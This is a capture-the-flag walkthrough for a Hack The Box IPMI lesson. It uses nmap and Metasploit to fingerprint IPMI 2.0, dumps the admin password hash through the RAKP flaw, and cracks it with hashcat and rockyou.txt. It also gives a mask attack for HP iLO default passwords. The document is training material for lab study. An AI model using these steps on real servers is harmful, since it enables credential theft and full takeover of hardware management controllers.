Solution to the HTB Intelligent Platform Management Interface Footprinting lesson
The Hack The Box (HTB) Intelligent Platform Management Interface (IPMI) module teaches you how to analyze and potentially exploit the target via IPMI. Here’s how to derive the solution and capture the flag.
Your directions in this exercise are to answer these questions (1) What username is configured for accessing the host via IPMI?, (2) Use hashcat to crack password – What is the account’s cleartext password?. Fire up the provided Pwnbox virtual machine and open a terminal.
IPMI, or Intelligent Platform Management Interface, is a standardized set of specifications for hardware-based platform management systems that enable centralized, remote control and monitoring of servers, independent of the server’s operating system, firmware, or even whether the server is powered on.
Key Features and Functions of IPMI
IPMI operates independently of the main system’s CPU, BIOS/UEFI, and OS, allowing system administrators to manage servers even if the machine is powered off or unresponsive. At the core of IPMI is a dedicated microcontroller called the BMC, which monitors hardware health (temperature, voltage, fan speeds), manages power (remote on/off/reset), logs system events, and provides remote access capabilities.
Administrators can perform tasks such as remotely installing an operating system, accessing the BIOS, rebooting the server, and mounting virtual media (like ISO images) for installations—all without physical access to the machine.
IPMI continuously monitors server health and can send alerts or log critical events, helping prevent or quickly resolve hardware failures.
Industry Support
IPMI is widely supported by major hardware vendors, including Cisco, Dell, Hewlett Packard Enterprise, and Intel, and has become a standard feature in most modern server hardware.
Footprinting the Service
IPMI communicates over port 623 UDP. Systems that utilize the IPMI protocol are known as Baseboard Management Controllers (BMCs). BMCs are commonly implemented as embedded ARM systems running Linux, and they are connected directly to the host motherboard.
If we can gain access to a BMC during an assessment, we will have full access to the host motherboard, allowing us to monitor, reboot, power off, or even reinstall the host operating system. Many BMCs, including HP iLO, Dell DRAC, and Supermicro IPMI, provide a web-based management console, as well as a command-line remote access protocol such as Telnet or SSH. Port 623 UDP is specifically designated for the IPMI network protocol.
Get the IPMI version with nmap
To begin, scan the target with nmap and the ipmi-version script like our lesson demonstrated. We can see that the service is running on port 623.
sudo nmap -sU --script ipmi-version -p 623 10.129.169.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-22 09:16 CDT
Nmap scan report for 10.129.169.168
Host is up (0.065s latency).
PORT STATE SERVICE
623/udp open asf-rmcp
Nmap done: 1 IP address (1 host up) scanned in 0.67 secondsGet the IPMI version using Metasploit
We can also get the IPMI version using Metasploit scanner module IPMI Information Discovery (auxiliary/scanner/ipmi/ipmi_version). This method tends to render better results than the nmap script.
msfconsole
Metasploit tip: Save the current environment with the save command,
future console restarts will use this environment again
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v6.4.43-dev ]
+ -- --=[ 2483 exploits - 1279 auxiliary - 393 post ]
+ -- --=[ 1463 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
[msf](Jobs:0 Agents:0) >> use auxiliary/scanner/ipmi/ipmi_version
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_version) >> set rhosts 10.129.169.168
rhosts => 10.129.169.168
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_version) >> show options
Module options (auxiliary/scanner/ipmi/ipmi_version):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each
set
RHOSTS 10.129.169.168 yes The target host(s), see https://docs.
metasploit.com/docs/using-metasploit/
basics/using-metasploit.html
RPORT 623 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_version) >> run
[*] Sending IPMI requests to 10.129.169.168->10.129.169.168 (1 hosts)
[+] 10.129.169.168:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedFrom our scan, we find the service is IPMI 2.0.
Use Metasploit to capture hash of IPMI passwords
Next, use Metasploit to see if we can enumerate any users and capture a hash of their password.
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_version) >> use auxiliary/scanner/ipmi/ipmi_dumphashes
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> set rhosts 10.129.169.168
rhosts => 10.129.169.168
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> show options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common
passwords as they are obtai
ned
OUTPUT_HASHCAT_FI no Save captured password hash
LE es in hashcat format
OUTPUT_JOHN_FILE no Save captured password hash
es in john the ripper forma
t
PASS_FILE /usr/share/metasp yes File containing common pass
loit-framework/da words for offline cracking,
ta/wordlists/ipmi one per line
_passwords.txt
RHOSTS 10.129.169.168 yes The target host(s), see htt
ps://docs.metasploit.com/do
cs/using-metasploit/basics/
using-metasploit.html
RPORT 623 yes The target port
SESSION_MAX_ATTEM 5 yes Maximum number of session r
PTS etries, required on certain
BMCs (HP iLO 4, etc)
SESSION_RETRY_DEL 5 yes Delay between session retri
AY es in seconds
THREADS 1 yes The number of concurrent th
reads (max one per host)
USER_FILE /usr/share/metasp yes File containing usernames,
loit-framework/da one per line
ta/wordlists/ipmi
_users.txt
View the full module info with the info, or info -d command.
[msf](Jobs:0 Agents:0) auxiliary(scanner/ipmi/ipmi_dumphashes) >> run
[+] 10.129.169.168:623 - IPMI - Hash found: admin:212095048200000001ac14f88d63dc0af7a462e47b29386d4d9357989c62d8ceaf49505f4ea81273a123456789abcdefa123456789abcdef140561646d696e:181c6968e6133f1d2d1e1f0823b15cef59dde89c
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedOur Metasploit module reports:
Hash found: admin:212095048200000001ac14f88d63dc0af7a462e47b29386d4d9357989c62d8ceaf49505f4ea81273a123456789abcdefa123456789abcdef140561646d696e:181c6968e6133f1d2d1e1f0823b15cef59dde89c
It also supplies the answer to the first question. The username configured for accessing the host using IPMI is “admin”.
Copy and paste the password hash (the characters after “admin:”) into a file. name is hashed.txt.
Crack IPMI hashed password
The lesson mentions a flaw in the RAKP protocol in IPMI 2.0. During the authentication process, the server sends a salted SHA1 or MD5 hash of the user’s password to the client before authentication takes place. This can be leveraged to obtain the password hash for ANY valid user account on the BMC. These password hashes can then be cracked offline using a dictionary attack using Hashcat mode 7300. In the event of an HP iLO using a factory default password, we can use this Hashcat mask attack command hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u which tries all combinations of upper case letters and numbers for an eight-character password.
You can try the above method but it will likely take longer than the life of your virtual machine. Instead, use a password wordlist, like rockyou.txt. Exit Metasploit and use wget to download the rockyou.txt password list to your current directory.
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
--2025-06-22 10:06:23-- https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Resolving github.com (github.com)... 140.82.113.3
Connecting to github.com (github.com)|140.82.113.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/97553311/d4f580f8-6b49-11e7-8f70-7f460f85ab3a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250622%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250622T150623Z&X-Amz-Expires=1800&X-Amz-Signature=d23f4df3521b050b67c83e01b16f410925c44b370913ac0d51f027c1da303441&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drockyou.txt&response-content-type=application%2Foctet-stream [following]
--2025-06-22 10:06:23-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/97553311/d4f580f8-6b49-11e7-8f70-7f460f85ab3a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250622%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250622T150623Z&X-Amz-Expires=1800&X-Amz-Signature=d23f4df3521b050b67c83e01b16f410925c44b370913ac0d51f027c1da303441&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drockyou.txt&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 139921497 (133M) [application/octet-stream]
Saving to: ‘rockyou.txt’
rockyou.txt 100%[===================>] 133.44M 310MB/s in 0.4s
2025-06-22 10:06:24 (310 MB/s) - ‘rockyou.txt’ saved [139921497/139921497]
┌─[us-academy-3]─[10.10.15.62]─[htb-ac-1915373@htb-tt0plfupru]─[~]
└──╼ [★]$ ls
cacert.der Documents hashed.txt Pictures rockyou.txt Videos
Desktop Downloads Music Public Templates
Now we can use hashcat to crack the password. We pass our hashed.txt file containing the password hash and the wordlist (rockyou.txt) that we wish to use.
┌─[us-academy-3]─[10.10.15.62]─[htb-ac-1915373@htb-tt0plfupru]─[~]
└──╼ [★]$ hashcat -m 7300 hashed.txt rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD EPYC 7543 32-Core Processor, skipped
OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 7543 32-Core Processor, 3923/7910 MB (988 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 1 sec
212095048200000001ac14f88d63dc0af7a462e47b29386d4d9357989c62d8ceaf49505f4ea81273a123456789abcdefa123456789abcdef140561646d696e:181c6968e6133f1d2d1e1f0823b15cef59dde89c:trinity
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7300 (IPMI2 RAKP HMAC-SHA1)
Hash.Target......: 212095048200000001ac14f88d63dc0af7a462e47b29386d4d9...dde89c
Time.Started.....: Sun Jun 22 10:06:44 2025 (0 secs)
Time.Estimated...: Sun Jun 22 10:06:44 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 1433.2 kH/s (0.48ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344384 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344384 (0.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: 123456 -> lovers1
Started: Sun Jun 22 10:06:42 2025
Stopped: Sun Jun 22 10:06:45 2025The cracked password is “trinity”.
